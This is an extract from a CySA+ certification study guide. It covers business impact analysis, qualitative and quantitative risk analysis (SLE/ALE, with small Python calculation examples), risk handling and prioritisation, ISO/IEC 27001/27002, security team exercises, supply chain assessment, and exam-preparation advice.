Identify Critical Processes and
Resources
When identifying the critical processes and resources of
an organization, the BCP committee must first identify
all the business units or functional areas within the
organization. After all units have been identified, the
BCP team should select which individuals will be
responsible for gathering all the needed data and select
how to obtain the data. These individuals will gather the
data using a variety of techniques, including
questionnaires, interviews, and surveys. They might also
actually perform a vulnerability analysis and risk
assessment or use the results of these tests as input for
the BIA. During the data gathering, the organization’s
business processes and functions and the resources upon
which these processes and functions depend should be
documented. This list should include all business assets,
including physical and financial assets that are owned by
the organization, and any assets that provide competitive
advantage or credibility.
After determining all the business processes, functions,
and resources, the organization should then determine
the criticality level of each process, function, and
resource. This is done by analyzing the impact that the
loss of each resource would impose on the capability to
continue to do business.
Identify Outage Impacts and
Estimate Downtime
Analyzing the impact that the loss of each resource
would impose on the ability to continue to do business
will provide the raw material to generate metrics used to
determine the extent to which redundancy must be
provided to each resource. You learned about metrics
such as MTD, MTTR, and RTO that are used to assess
downtime and recovery time in Chapter 16, “Applying
the Appropriate Incident Response Procedure.” Please
review those concepts.
Identify Resource Requirements
After the criticality level of each process, function, and
resource is determined, you need to determine all the
resource requirements for each process, function, and
resource. For example, an organization’s accounting
system might rely on a server that stores the accounting
application, another server that holds the database,
various client systems that perform the accounting tasks
over the network, and the network devices and
infrastructure that support the system. Resource
requirements should also consider any human resources
requirements. When human resources are unavailable,
the organization can be just as negatively impacted as
when technological resources are unavailable.
Note
Keep in mind that the priority for any CySA professional should be the safety of
human life. Consider and protect all other organizational resources only after
personnel are safe.
The organization must document the resource
requirements for every resource that would need to be
restored when the disruptive event occurs. This includes
device name, operating system or platform version,
hardware requirements, and device interrelationships.
Identify Recovery Priorities
After all the resource requirements have been identified,
the organization must identify the recovery priorities.
Establish recovery priorities by taking into consideration
process criticality, outage impacts, tolerable downtime,
and system resources. After all this information is
compiled, the result is an information system recovery
priority hierarchy.
Three main levels of recovery priorities should be used:
high, medium, and low. The BIA stipulates the recovery
priorities but does not provide the recovery solutions.
Those are given in the disaster recovery plan (DRP).
Recoverability
Recoverability is the ability of a function or system to
be recovered in the event of a disaster or disruptive
event. As part of recoverability, downtime must be
minimized. Recoverability places emphasis on the
personnel and resources used for recovery.
Fault Tolerance
Fault tolerance is provided when a backup component
begins operation when the primary component fails. One
of the key aspects of fault tolerance is the lack of service
interruption. Varying levels of fault tolerance can be
achieved at most levels of the organization based on how
much an organization is willing to spend. However, the
backup component often does not provide the same level
of service as the primary component. For example, an
organization might implement a high-speed OC-1 connection to the Internet. However, the backup connection to the Internet that is used in the event of the failure of the OC-1 line might be much slower but at a much lower cost of implementation than the primary OC-1 connection.
RISK IDENTIFICATION
PROCESS
A risk assessment is a tool used in risk management
to identify vulnerabilities and threats, assess the impact
of those vulnerabilities and threats, and determine which
controls to implement. This is also called risk
identification. Risk assessment (or analysis) has four
main goals:
• Identify assets and asset value.
• Identify vulnerabilities and threats.
• Calculate threat probability and business impact.
• Balance threat impact with countermeasure cost.
Prior to starting a risk assessment, management and the
risk assessment team must determine which assets and
threats to consider. This process determines the size of
the project. The risk assessment team must then provide
a report to management on the value of the assets
considered. Management can then review and finalize
the asset list, adding and removing assets as it sees fit,
and then determine the budget of the risk assessment
project.
Let’s look at a specific scenario to help understand the
importance of system-specific risk analysis. In our
scenario, the Sales division decides to implement
touchscreen technology and tablet computers to increase
productivity. As part of this new effort, a new sales
application will be developed that works with the new
technology. At the beginning of the deployment, the chief
security officer (CSO) attempted to prevent the
deployment because the technology is not supported in
the enterprise. Upper management decided to allow the
deployment. The CSO should work with the Sales
division and other areas involved so that the risk
associated with the full life cycle of the new deployment
can be fully documented and appropriate controls and
strategies can be implemented during deployment.
Risk assessment should be carried out before any
mergers and acquisitions occur or new technology and
applications are deployed. If a risk assessment is not
supported and directed by senior management, it will
not be successful. Management must define the purpose
and scope of a risk assessment and allocate the
personnel, time, and monetary resources for the project.
There are several approaches to performing a risk
assessment, covered in the following sections.
Make Risk Determination Based
upon Known Metrics
To make a risk determination, an organization must
perform a formal risk analysis. A formal risk analysis
often asks questions such as these: What corporate
assets need to be protected? What are the business needs
of the organization? What outside threats are most likely
to compromise network security? Different types of risk
analysis, including qualitative risk analysis and
quantitative risk analysis, should be used to ensure that
the data obtained is maximized.
Qualitative Risk Analysis
A qualitative risk analysis does not assign monetary
and numeric values to all facets of the risk analysis
process. Qualitative risk analysis techniques include
intuition, experience, and best practice techniques, such
as brainstorming, focus groups, surveys, questionnaires,
meetings, interviews, and Delphi. The Delphi technique
is a method used to estimate the likelihood and outcome
of future events. Although all these techniques can be
used, most organizations will determine the best
technique(s) based on the threats to be assessed.
Conducting a qualitative risk analysis requires a risk
assessment team that has experience and education
related to assessing threats.
Each member of the group who has been chosen to
participate in the qualitative risk analysis uses his or her
experience to rank the likelihood of each threat and the
damage that might result. After each group member
ranks the threat possibility, loss potential, and safeguard
advantage, data is combined in a report to present to
management.
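To make that combination step concrete, the following Python sketch shows one simple way the individual rankings might be aggregated for the management report. It is only an illustration under assumed conventions: the threats, the 1-to-5 rating scale, and the use of a simple average are all hypothetical choices, since the chapter does not prescribe a specific aggregation method.

from statistics import mean

# Hypothetical (likelihood, impact) rankings from three experts, on a 1-5 scale
rankings = {
    "Ransomware outbreak": [(4, 5), (5, 4), (4, 4)],
    "Insider data theft": [(2, 5), (3, 4), (2, 4)],
}

for threat, scores in rankings.items():
    avg_likelihood = mean(s[0] for s in scores)  # combined likelihood ranking
    avg_impact = mean(s[1] for s in scores)      # combined damage/impact ranking
    print(f"{threat}: likelihood={avg_likelihood:.1f}, impact={avg_impact:.1f}")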
Two advantages of qualitative over quantitative risk
analysis (discussed next) are that qualitative prioritizes
the risks and identifies areas for immediate
improvement in addressing the threats. Disadvantages of
qualitative risk analysis are that all results are subjective
and a dollar value is not provided for cost/benefit
analysis or for budget help.
Note
When performing risk analyses, all organizations experience issues with any
estimate they obtain. This lack of confidence in an estimate is referred to as
uncertainty and is expressed as a percentage. Any reports regarding a risk
assessment should include the uncertainty level.
Quantitative Risk Analysis
A quantitative risk analysis assigns monetary and
numeric values to all facets of the risk analysis process,
including asset value, threat frequency, vulnerability
severity, impact, and safeguard costs. Equations are used
to determine total and residual risks. An advantage of
quantitative over qualitative risk analysis is that
quantitative uses less guesswork than qualitative.
Disadvantages of quantitative risk analysis include the
difficulty of the equations, the time and effort needed to
complete the analysis, and the level of data that must be
gathered for the analysis.
Most risk analyses include some hybrid of both
quantitative and qualitative techniques. Most
organizations favor using quantitative risk analysis for
tangible assets and qualitative risk analysis for intangible
assets. Keep in mind that even though quantitative risk
analysis uses numeric values, a purely quantitative
analysis cannot be achieved because some level of
subjectivity is always part of the data. This type of
estimate should be based on historical data, industry
experience, and expert opinion.
RISK CALCULATION
A quantitative risk analysis assigns monetary and
numeric values to all facets of the risk analysis process,
including asset value, threat frequency, vulnerability
severity, impact, safeguard costs, and so on. Equations
are used to determine total and residual risks. The most
common equations are for single loss expectancy and
annual loss expectancy.
The single loss expectancy (SLE) is the monetary
impact of each threat occurrence. To determine the SLE,
you must know the asset value (AV) and the
exposure factor (EF), which is the percentage value
or functionality of an asset that will be lost when a threat
event occurs. The calculation for obtaining the SLE is as
follows:
SLE = AV × EF
For example, an organization has a web server farm with
an AV of $20,000. If the risk assessment has determined
that a power failure is a threat agent for the web server
farm and the EF for a power failure is 25%, the SLE for
this event equals $5000.
The annual loss expectancy (ALE) is the expected
risk factor of an annual threat event. To determine the
ALE, you must know the SLE and the annualized rate
of occurrence (ARO), which is the estimate of how
often a given threat might occur annually. The
calculation for obtaining the ALE is as follows:
ALE = SLE × ARO
Using the previously mentioned example, if the risk
assessment has determined that the ARO for the power
failure of the web server farm is 50%, the ALE for this
event equals $2500. Security professionals should keep
in mind that this calculation can be adjusted for
geographic factors, because the ARO of threats such as
natural disasters varies by location.
Using the ALE, the organization can decide whether to
implement controls or not. If the annual cost of the
control to protect the web server farm is more than the
ALE, the organization could easily choose to accept the
risk by not implementing the control. If the annual cost
of the control to protect the web server farm is less than
the ALE, the organization should consider implementing
the control.
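Because the SLE and ALE formulas are simple arithmetic, they are easy to express in code. The following Python sketch is a minimal illustration that reuses the web server farm figures from the example above; the $3,000 annual control cost is a hypothetical value added only to show the cost/benefit comparison.

def single_loss_expectancy(asset_value, exposure_factor):
    # SLE = AV x EF
    return asset_value * exposure_factor

def annual_loss_expectancy(sle, aro):
    # ALE = SLE x ARO
    return sle * aro

sle = single_loss_expectancy(asset_value=20_000, exposure_factor=0.25)  # $5,000
ale = annual_loss_expectancy(sle, aro=0.5)                              # $2,500

annual_control_cost = 3_000  # hypothetical annual cost of the control
if annual_control_cost < ale:
    print(f"Consider implementing the control: ${annual_control_cost:,} < ALE ${ale:,.0f}")
else:
    print(f"Consider accepting the risk: ${annual_control_cost:,} >= ALE ${ale:,.0f}")

With these hypothetical figures, the control costs more per year than the expected annual loss, so accepting the risk may be the more economical choice.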
As previously mentioned, even though quantitative risk
analysis uses numeric values, a purely quantitative
analysis cannot be achieved because some level of
subjectivity is always part of the data. In the previous
example, how does the organization know that damage
from the power failure will be 25% of the asset? This type
of estimate should be based on historical data, industry
experience, and expert opinion.
Probability
Both qualitative and quantitative risk analysis processes
take into consideration the probability that an event will
occur. In quantitative risk analysis, this consideration is
made using the ARO value for each event. In qualitative
risk assessment, each possible event is assigned a
probability value by subject matter experts.
Magnitude
Both qualitative and quantitative risk analysis processes
take into consideration the magnitude of an event that
might occur. In quantitative risk analysis, this
consideration is made using the SLE and ALE values for
each event. In qualitative risk assessment, each possible
event is assigned an impact (magnitude) value by subject
matter experts.
COMMUNICATION OF RISK
FACTORS
Technical cybersecurity risks represent a threat that is
largely misunderstood by non-technical personnel.
Security professionals must bridge the knowledge gap in
a manner that the stakeholders understand. To properly
communicate technical risks, security professionals must
first understand their audience and then be able to
translate those risks into business terms that the
audience understands.
The audience that needs to understand the technical
risks includes semi-technical audiences, non-technical
leadership, the board of directors and executives, and
regulators. The semi-technical audience understands the
security operations difficulties and often consists of
powerful allies. Typically, this audience needs a data-driven, high-level message based on verifiable facts and
trends. The non-technical leadership audience needs the
message to be put in context with their responsibilities.
This audience needs the cost of cybersecurity
expenditures to be tied to business performance.
Security professionals should present metrics that show
how cyber risk is trending, without using popular jargon.
The board of directors and executives are primarily
concerned with business risk management and
managing return on assets. The message to this group
should translate technical risk into common business
terms and present metrics about cybersecurity risk and
performance.
Finally, when communicating with regulators, it is
important to be thorough and transparent. In addition,
organizations may want to engage a third party to do a
gap assessment before an audit. This helps security
professionals find and remediate weaknesses prior to the
audit and enables the third party to speak on behalf of
the security program.
To frame the technical risks into business terms for these
audiences, security professionals should focus on
business disruption, regulatory issues, and bad press. If a
company’s database is attacked and, as a result, the
website cannot sell products to customers, this is a
significant disruption of business operations. If an
incident occurs that results in a regulatory investigation
and fines, a regulatory issue has arisen. Bad press can
result in lost sales and costs to repair the organization’s
image.
Security professionals must understand the risk metrics
and what each metric costs the organization. Although
security professionals may not definitively know the
return on investment (ROI), they should take the
security incident frequency at the organization and
assign costs in terms of risk exposure for every risk. It is
also helpful to match the risks with the assets protected
to make sure the organization’s investment is protecting
the most valuable assets.
Moreover, security professionals alone cannot best
determine the confidentiality, integrity, and availability
(CIA) levels for enterprise information assets. Security
professionals should consult with the asset stakeholders
to gain their input on which level should be assigned to
each tenet for an information asset. Keep in mind,
however, that all stakeholders should be consulted. For
example, while department heads should be consulted
and have the biggest influence on the CIA decisions
about departmental assets, other stakeholders within the
department and organization should be consulted as
well.
This rule holds for any security project that an enterprise
undertakes. Stakeholder input should be critical at the
start of the project to ensure that stakeholder needs are
documented and to gain stakeholder project buy-in.
Later, if problems arise with the security project and
changes must be made, the project team should discuss
the potential changes with the project stakeholders
before any project changes are approved or
implemented.
RISK PRIORITIZATION
As previously discussed, by using either quantitative or
qualitative analysis, you can arrive at a priority list that
indicates which issues need to be treated sooner rather
than later and which can wait. In qualitative analysis,
one method used is called a risk assessment matrix.
When a qualitative assessment is conducted, the risks are
placed into the following categories:
• High
• Medium
• Low
Then, a risk assessment matrix, such as the one in Figure
20-1, is created. Subject matter experts grade all risks based on
their likelihood and impact. This helps prioritize the
application of resources to the most critical
vulnerabilities.
Figure 20-1 Risk Assessment Matrix
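To show how such a matrix translates into a prioritized list, the following Python sketch assigns a qualitative priority from likelihood and impact ratings. The risks, the 1-to-3 numeric mapping, and the score thresholds are hypothetical conventions chosen for illustration; an actual matrix reflects the judgments of the organization's subject matter experts.

LEVELS = {"low": 1, "medium": 2, "high": 3}

def priority(likelihood, impact):
    # Combine the two ratings and bucket the product into a priority
    score = LEVELS[likelihood] * LEVELS[impact]
    if score >= 6:
        return "high"
    if score >= 3:
        return "medium"
    return "low"

# Hypothetical risks rated (likelihood, impact) by subject matter experts
risks = [
    ("Power failure in server room", "medium", "high"),
    ("Phishing against sales staff", "high", "medium"),
    ("Flood at primary data center", "low", "high"),
]

# List the most critical risks first so resources go to them
for name, likelihood, impact in sorted(
        risks, key=lambda r: LEVELS[r[1]] * LEVELS[r[2]], reverse=True):
    print(f"{priority(likelihood, impact):>6}: {name}")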
Security Controls
Chapter 21, “The Importance of Frameworks, Policies,
Procedures, and Controls,” delves deeply into the types
of controls that can be implemented to address security
issues. The selection of controls that are both cost
effective and capable of addressing the issue depends in
large part of how an organizations chooses to address or
handle risk. The following four basic methods are used to
handle risk:
• Risk avoidance: Terminating the activity that
causes a risk or choosing an alternative that is not
as risky
• Risk transfer: Passing on the risk to a third
party, such as an insurance company
• Risk mitigation: Defining the acceptable risk
level the organization can tolerate and reducing
the risk to that level
• Risk acceptance: Understanding and accepting
the level of risk as well as the cost of damages that
can occur
Engineering Tradeoffs
In some cases, there may be issues that make
implementing a particular solution inadvisable or
impossible. Engineering tradeoffs are inhibitors to
remediation and are covered in the following sections.
MOUs
A memorandum of understanding (MOU) is a
document that, while not legally binding, indicates a
general agreement between the principals to do
something together. An organization may have MOUs
with multiple organizations, and MOUs may in some
instances contain security requirements that inhibit or
prevent the deployment of certain measures.
SLAs
A service-level agreement (SLA) is a document that
specifies a service to be provided by a party, the costs of
the service, and the expectations of performance. These
contracts may exist with third parties from outside the
organization and between departments within an
organization. Sometimes these SLAs may include
specifications that inhibit or prevent the deployment of
certain measures.
Organizational Governance
Organizational governance refers to the process of
controlling an organization’s activities, processes, and
operations. When the process is unwieldy, as it is in
some very large organizations, the application of
countermeasures may be frustratingly slow. One of the
reasons for including upper management in the entire
process is to use the weight of authority to cut through
the red tape.
Business Process Interruption
The deployment of mitigations cannot be done in such a
way that business operations and processes are
interrupted. Therefore, the need to conduct these
activities during off hours can also be a factor that
impedes the remediation of vulnerabilities.
Degrading Functionality
Finally, some solutions create more issues than they
resolve. In some cases, it may be impossible to
implement mitigation due to the fact that it breaks
mission-critical applications or processes. The
organization may need to research an alternative
solution.
SYSTEMS ASSESSMENT
Systems assessment is a process whereby
systems are fully vetted for potential issues from both a
functionality standpoint and a security standpoint. These
assessments (discussed more fully in Chapter 21) can
lead to two types of organizational approvals:
accreditation and certification. Although the terms are
used as synonyms in casual conversation, accreditation
and certification are two different concepts in the context
of assurance levels and ratings. However, they are closely
related. Certification evaluates the technical system
components, whereas accreditation occurs when the
adequacy of a system’s overall security is accepted by
management.
ISO/IEC 27001
ISO/IEC 27001:2013 is the current version of the
27001 standard, and it is one of the most popular
standards by which organizations obtain certification for
information security. It provides guidance on ensuring
that an organization’s information security management
system (ISMS) is properly established, implemented,
maintained, and continually improved. It includes the
following components:
• ISMS scope
• Information security policy
• Risk assessment process and its results
• Risk treatment process and its decisions
• Information security objectives
• Information security personnel competence
• Necessary ISMS-related documents
• Operational planning and control document
• Information security monitoring and
measurement evidence
• ISMS internal audit program and its results
• Top management ISMS review evidence
• Evidence of identified nonconformities and
corrective actions
When an organization decides to obtain ISO/IEC 27001
certification, a project manager should be selected to
ensure that all the components are properly completed.
To implement ISO/IEC 27001:2013, the project manager
should complete the following steps:
Step 1. Obtain management support.
Step 2. Determine whether to use consultants or to
complete the work in-house, purchase the
27001 standard, write the project plan, define
the stakeholders, and organize the project
kickoff.
Step 3. Identify the requirements.
Step 4. Define the ISMS scope, information security
policy, and information security objectives.
Step 5. Develop document control, internal audit,
and corrective action procedures.
Step 6. Perform risk assessment and risk treatment.
Step 7. Develop a statement of applicability and a
risk treatment plan and accept all residual
risks.
Step 8. Implement the controls defined in the risk
treatment plan and maintain the
implementation records.
Step 9. Develop and implement security training
and awareness programs.
Step 10. Implement the ISMS, maintain policies and
procedures, and perform corrective actions.
Step 11. Maintain and monitor the ISMS.
Step 12. Perform an internal audit and write an
audit report.
Step 13. Perform management review and maintain
management review records.
Step 14. Select a certification body and complete
certification.
Step 15. Maintain records for surveillance visits.
For more information, visit
https://www.iso.org/standard/54534.html.
ISO/IEC 27002
ISO/IEC 27002:2013 is the current version of the
27002 standard, and it provides a code of practice for
information security management. It includes the
following 14 content areas:
• Information security policy
• Organization of information security
• Human resources security
• Asset management
• Access control
• Cryptography
• Physical and environmental security
• Operations security
• Communications security
• Information systems acquisition, development,
and maintenance
• Supplier relationships
• Information security incident management
• Information security aspects of business
continuity
• Compliance
For more information, visit
https://www.iso.org/standard/54533.html.
DOCUMENTED
COMPENSATING CONTROLS
As pointed out in the section “Engineering Tradeoffs”
earlier in this chapter, in some cases, there may be issues
that make implementing a particular solution
inadvisable or impossible. Not all weaknesses can be
eliminated. In some cases, they can only be mitigated.
This can be done by implementing controls that
compensate for a weakness that cannot be completely
eliminated. A compensating control reduces the
potential risk. Compensating controls are also referred to
as countermeasures and safeguards. Three things must
be considered when implementing a compensating
control: vulnerability, threat, and risk. For example, a
good countermeasure might be to implement the
appropriate ACL and encrypt the data. The ACL protects
the integrity of the data, and the encryption protects the
confidentiality of the data.
Compensating controls are put in place to substitute for
a primary access control and mainly act to mitigate risks.
By using compensating controls, you can reduce risk to a
more manageable level. Examples of compensating
controls include requiring two authorized signatures to
release sensitive or confidential information and
requiring two keys owned by different personnel to open
a safety deposit box. These compensating controls must
be recorded along with the reason the primary control
was not implemented. Compensating controls are
covered further in Chapter 21.
TRAINING AND EXERCISES
Security analysts must practice responding to security
events in order to react to them in the most organized
and efficient manner. There are some well-established
ways to approach this. This section looks at how teams of
analysts, both employees and third-party contractors,
can be organized and some well-established names for
these teams. Security posture is typically assessed by war
game exercises in which one group attacks the network
while another attempts to defend the network. These
games typically have some implementation of the
following teams.
Red Team
The red team acts as the attacking force. It typically
carries out penetration tests by following a well-established process of gathering information about the
network, scanning the network for vulnerabilities, and
then attempting to take advantage of the vulnerabilities.
The actions they can take are established ahead of time
in the rules of engagement. Often these individuals are
third-party contractors with no prior knowledge of the
network. This helps them simulate attacks that are not
inside jobs.
Blue Team
The blue team acts as the network defense team, and
the attempted attack by the red team tests the blue
team’s ability to respond to the attack. It also serves as
practice for a real attack. This includes accessing log
data, using a SIEM, garnering intelligence information,
and performing traffic and data flow analysis.
White Team
The white team is a group of technicians who referee
the encounter between the red team and the blue team.
Enforcing the rules of engagement might be one of the
white team’s roles, along with monitoring the responses
to the attack by the blue team and making note of
specific approaches employed by the red team.
Tabletop Exercise
Conducting a tabletop exercise is the most cost-effective
and efficient way to identify areas of vulnerability before
moving on to higher-level testing. A tabletop exercise
is an informal brainstorming session that encourages
participation from business leaders and other key
employees. In a tabletop exercise, the participants agree
on a particular attack scenario and then focus the
discussion on that scenario.
SUPPLY CHAIN
ASSESSMENT
Organizational risk mitigation requires assessing the
safety and the integrity of the hardware and software
before the organization purchases it. The following are
some of the methods used to assess the supply chain
through which a hardware or software product flows to
ensure that the product does not pose a security risk to
the organization.
Vendor Due Diligence
Performing due diligence with regard to a vendor means
assessing the vendor's products and services. While we
are certainly concerned with the functionality and value
of the products, we are even more concerned about the innate
security of such products. Stories about counterfeit gear
that contains backdoors have circulated for years and are
not unfounded. Online resources for conducting due
diligence about vendors include
https://complyadvantage.com/knowledgebase/vendorduediligence/.
OEM Documentation
One of the ways you can reduce the likelihood of
purchasing counterfeit equipment is to insist on the
inclusion of verifiable original equipment manufacturer
(OEM) documentation. In many cases, this paperwork
includes anti-counterfeiting features. Make sure to use
the vendor website to verify all the various identifying
numbers in the documentation.
Hardware Source Authenticity
When purchasing hardware to support any network or
security solution, a security professional must ensure
that the hardware’s authenticity can be verified. Just as
expensive consumer items such as purses and watches
can be counterfeited, so can network equipment.
Whereas the dangers with counterfeit consumer items
are typically confined to a lack of authenticity and
potentially lower quality, the dangers presented by
counterfeit network gear can extend to the presence of
backdoors in the software or firmware. Always purchase
equipment directly from the manufacturer when
possible, and when purchasing from resellers, use
caution and insist on a certificate of authenticity. In any
case where the price seems too good to be true, keep in
mind that it may be an indication the gear is not
authentic.
Trusted Foundry
The Trusted Foundry program can help you
exercise care in ensuring the authenticity and integrity of
the components of hardware purchased from a vendor.
This DoD program identifies “trusted vendors” and
ensures a “trusted supply chain.” A trusted supply chain
begins with trusted design and continues with trusted
mask, foundry, packaging/assembly, and test services. It
ensures that systems have access to leading-edge
integrated circuits from secure, domestic sources. At the
time of this writing, 77 vendors have been certified as
trusted.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 20-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 20-2 Key Topics in Chapter 20
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
business impact analysis (BIA)
Business Continuity Planning (BCP) committee
recoverability
fault tolerance
risk assessment
qualitative risk analysis
quantitative risk analysis
single loss expectancy (SLE)
annual loss expectancy (ALE)
asset value (AV)
exposure factor (EF)
annualized rate of occurrence (ARO)
risk assessment matrix
risk avoidance
risk transfer
risk mitigation
risk acceptance
memorandum of understanding (MOU)
service-level agreement (SLA)
organizational governance
systems assessment
ISO/IEC 27001:2013
ISO/IEC 27002:2013
red team
blue team
white team
tabletop exercise
Trusted Foundry program
REVIEW QUESTIONS
1. The vulnerability analysis and risk assessment may
be performed by the __________________ or
by a separately appointed risk assessment team.
2. List the four main steps of the BIA in order.
3. Match the following terms with their definitions.
4. ____________________ assigns monetary and
numeric values to all facets of the risk analysis
process, including asset value, threat frequency,
vulnerability severity, impact, and safeguard costs.
5. An organization has a web server farm with an AV
of $20,000. If the risk assessment has determined
that a power failure is a threat agent for the web
server farm and the EF for a power failure is 25%,
the SLE for this event equals $_____________.
6. Match the following terms with their definitions.
7. The _______________________ helps
prioritize the application of resources to the most
critical vulnerabilities during qualitative risk
assessment.
8. List and define at least two ways to handle risk.
9. Match the following terms with their definitions.
10. ALE = ________________
Chapter 21. The Importance of Frameworks, Policies, Procedures, and Controls
This content is currently in development.
Chapter 22. Final
Preparation
The purpose of this chapter is to demystify the
certification preparation process for you. This includes
taking a more detailed look at the actual certification
exam itself. This chapter shares some helpful ideas on
ensuring that you are ready for the exam. Many people
become anxious about taking exams, so this chapter
gives you the tools to build confidence for exam day.
The first 21 chapters of this book cover the technologies,
protocols, design concepts, and considerations required
to be prepared to pass the CompTIA Cybersecurity
Analyst (CySA+) CS0-002 exam. While these chapters
supply the detailed information, most people need more
preparation than just reading the first 21 chapters of this
book. This chapter details a set of tools and a study plan
to help you complete your preparation for the exams.
This short chapter has four main sections. The first
section lists the CompTIA CySA+ CS0-002 exam
information and breakdown. The second section shares
some important tips to keep in mind to ensure you are
ready for this exam. The third section discusses exam
preparation tools useful at this point in the study
process. The final section of this chapter lists a suggested
study plan now that you have completed all the earlier
chapters in this book.
Note
Appendix C, “Memory Tables,” and Appendix D, “Memory Tables Answer Key,”
exist as soft-copy appendixes on the website for this book, which you can
access by going to https://www.pearsonITcertification.com/register, registering
your book, and entering this book’s ISBN: 9780136747161.
EXAM INFORMATION
Here are details you should be aware of regarding the
exam that maps to this text.
Exam code: CS0-002
Question types: Multiple-choice and performance-based questions
Number of questions: Maximum of 85
Time limit: 165 minutes
Required passing score: 750 (on a scale of 100 to
900)
Exam fee (subject to change): $359.00 USD
Note
The following information is copied from the CompTIA CySA+ web page.
As attackers have learned to evade traditional signature-based solutions, such as firewalls and anti-virus
software, an analytics-based approach within the IT
security industry is increasingly important for
organizations. CompTIA CySA+ applies behavioral
analytics to networks to improve the overall state of
security through identifying and combating malware and
advanced persistent threats (APTs), resulting in an
enhanced threat visibility across a broad attack surface.
It will validate an IT professional’s ability to proactively
defend and continuously improve the security of an
organization. CySA+ will verify the successful candidate
has the knowledge and skills required to
• Leverage intelligence and threat detection
techniques
• Analyze and interpret data
• Identify and address vulnerabilities
• Suggest preventative measures
• Effectively respond to and recover from incidents
GETTING READY
Here are some important tips to keep in mind to ensure
that you are ready for this rewarding exam:
Note
Recently CompTIA has expanded its online testing offerings to include the CySA+ exam. For information on this option, see https://www.comptia.org/testing/testing-options/take-online-exam.
• Build and use a study tracker: Consider
taking the exam objectives and building a study
tracker. This can be a notebook outlining the
objectives, with your notes written out. Using
pencil and paper can help concentration by
making you take the time to think about potential
answers to questions that might be asked on the
exam for each objective. A study tracker will help
ensure that you have not missed anything and
that you are confident for your exam. There are
other ways, including a sample Study Planner as a
website supplement to this book (Appendix E).
Whatever works best for you is the right option to
use.
• Think about your time budget for questions
in the exam: When you do the math, you realize
that you have a bit less than 2 minutes per exam
question. While this does not sound like enough
time, keep in mind that many of the questions will
be very straightforward, and you will take 15 to 30
seconds on those. This builds time for other
questions as you take your exam.
• Watch the clock: Periodically check the time
remaining as you are taking the exam. You might
even find that you can slow down pretty
dramatically if you have built up a nice block of
extra time.
• Consider ear plugs: Some people are sensitive
to noise when concentrating. If you are one of
them, ear plugs may help. There might be other
test takers in the center with you and you do not
want to be distracted by them.
• Plan your travel time: Give yourself extra time
to find the center and get checked in. Be sure to
arrive early. As you test more at that center, you
can certainly start cutting it closer time-wise.
• Get rest: Most students report success with
getting plenty of rest the night before the exam.
All-night cram sessions are not typically
successful.
• Bring in valuables but get ready to lock
them up: The testing center will take your
phone, your smart watch, your wallet, and other
such items and will provide a secure place for
them.
• Use the restroom before going in: If you
think you will need a break during the test, clarify
the rules with the test proctor.
• Take your time getting settled: Once you are
seated, take a breath and organize your thoughts.
Remind yourself that you have worked hard for
this opportunity and expect to do well. The 165-minute
timer doesn't start until you tell it to after a brief
tutorial; it begins when you agree to see the first question.
• Take notes: You will be given note-taking
materials, so take advantage of them. Sketch out
lists and mnemonics that you memorized. The
note paper can be used for any calculations you
need, but it is okay to write notes to yourself
before beginning.
• Practice exam questions are great—so use
them: This text provides many practice exam
questions. Be sure to go through them thoroughly.
Remember, you shouldn’t blindly memorize
answers; instead, let the questions really
demonstrate where you are weak in your
knowledge and then study up on those areas.
TOOLS FOR FINAL
PREPARATION
This section lists some information about the available
tools and how to access the tools.
Pearson Test Prep Practice Test
Software and Questions on the
Website
Register this book to get access to the Pearson Test Prep
practice test software (software that displays and grades
a set of exam-realistic, multiple-choice questions). Using
the Pearson Test Prep practice test software, you can
either study by going through the questions in Study
mode or take a simulated (timed) CySA+ exam.
The Pearson Test Prep practice test software comes with
two full practice exams. These practice tests are available
to you either online or as an offline Windows application.
To access the practice exams that were developed with
this book, please see the instructions in the card inserted
in the sleeve in the back of the book. This card includes a
unique access code that enables you to activate your
exams in the Pearson Test Prep software. You will find
detailed instructions for accessing the Pearson Test Prep
software in the Introduction to this book.
Memory Tables
Like most exam Cert Guides, this book purposely
organizes information into tables and lists for easier
study and review. Rereading these tables and lists can be
very useful before the exam. However, it is easy to skim
over the tables without paying attention to every detail,
especially when you remember having seen the table’s
contents when reading the chapter.
Instead of just reading the tables in the various chapters,
this book’s Appendixes C and D give you another review
tool. Appendix C lists partially completed versions of
many of the tables from the book. You can open
Appendix C (a PDF available on the book website after
registering) and print the appendix. For review, you can
attempt to complete the tables. This exercise can help
you focus on the review. It also exercises the memory
connectors in your brain, and it prompts you to think
about the information from context clues, which forces a
little more contemplation about the facts.
Appendix D, also a PDF located on the book website, lists
the completed tables to check yourself. You can also just
refer to the tables as printed in the book.
Chapter-Ending Review Tools
Chapters 1 through 21 each have several features in the
“Exam Preparation Tasks” section at the end of the
chapter. You might have already worked through these in
each chapter. It can also be helpful to use these tools
again as you make your final preparations for the exam.
SUGGESTED PLAN FOR
FINAL REVIEW/STUDY
This section lists a suggested study plan that should
guide you until you take the CompTIA Cybersecurity
Analyst (CySA+) CS0-002 exam. Certainly, you can
ignore this plan, use it as is, or just take suggestions from
it.
The plan uses four steps:
Step 1. Review the key topics and the “Do I
Know This Already?” questions: You can
use the table that lists the key topics in each
chapter, or just flip the pages looking for key
topics. Also, reviewing the DIKTA quiz
questions from the beginning of the chapter
can be helpful for review.
Step 2. Complete memory tables: Open
Appendix C from the book website and print
the entire thing, or print the tables by major
part. Then complete the tables.
Step 3. Review the “Review Questions”
sections: Go through the review questions at
the end of each chapter to identify areas
where you need more study.
Step 4. Use the Pearson Test Prep practice
test software to practice: You can use the
Pearson Test Prep practice test software to
study by using a bank of unique exam-realistic questions available only with this
book.
SUMMARY
The tools and suggestions listed in this chapter have
been designed with one goal in mind: to help you develop
the skills required to pass the CompTIA Cybersecurity
Analyst (CySA+) CS0-002 exam. This book has been
developed from the beginning to not just tell you the
facts but also help you learn how to apply them. No
matter what your experience level leading up to when
you take the exam, it is my hope that the broad range of
preparation tools and the structure of the book help you
pass the exam with ease. I hope you do well on the exam.
Appendix A. Answers to the "Do I Know This Already?" Quizzes and Review Questions
This content is currently in development.
Appendix B. CompTIA Cybersecurity Analyst (CySA+) CS0-002 Cert Guide Exam Updates
This content is currently in development.
Glossary of Key Terms
This content is currently in development.
Appendix C. Memory Tables
This content is currently in development.
